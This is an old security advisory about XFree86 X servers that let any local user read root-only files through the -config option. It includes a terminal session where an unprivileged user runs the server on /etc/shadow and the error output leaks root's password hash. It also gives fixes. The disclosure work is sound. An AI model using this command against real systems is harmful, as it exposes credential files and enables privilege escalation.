COMMAND
XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...)
SYSTEMS AFFECTED
Systems running XFree86 3.3.1, 3.2.9 and 3.1.2 (other versions as
well)
PROBLEM
Nicolas Dubee found following "feature" in all default XFree86
servers. The XFree86 servers let you specify an alternate
configuration file and do not check whether you have rights to
read it. Any user can read files with root permissions. Here it
is:
Script started on Sat Aug 23 15:32:36 1997
Loading /usr/lib/kbd/keytables/fr-latin1.map
[plaguez@plaguez plaguez]$ uname -a
Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586
[plaguez@plaguez plaguez]$ ls -al /etc/shadow
-rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow
[plaguez@plaguez bin]$ id
uid=502(plaguez) gid=500(users) groups=500(users)
[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin
[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow
Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
use: X [:<display>] [option]
-a # mouse acceleration (pixels)
-ac disable access control restrictions
-audit int set audit trail level
-auth file select authorization file
-bc enable bug compatibility
-bs disable any backing store support
-c turns off key-click
... and so on. HINT: look at the first XF86_SVGA output line. It
seems that this affects any platform using X11R6 XC/TOG code where
the Xserver is installed setuid root (although on non-XFree86
platforms you may need to be a little more inventive with the use
of the -config option).
SOLUTION
If you run xdm, you should consider removing the setuid bit of the
servers. If not, wait for the XFree86 Project to bring you a
patch.
The fix is to disable the '-config' Xserver option. This will be
removed in next release, and also in the next X11 release from
The Open Group. It was only added to get around problems on OS's
with small command line length limits, and should never have been
enabled for most Unix-like OSs.
Note also that Debian Linux is clean as the X servers aren't
setuid root.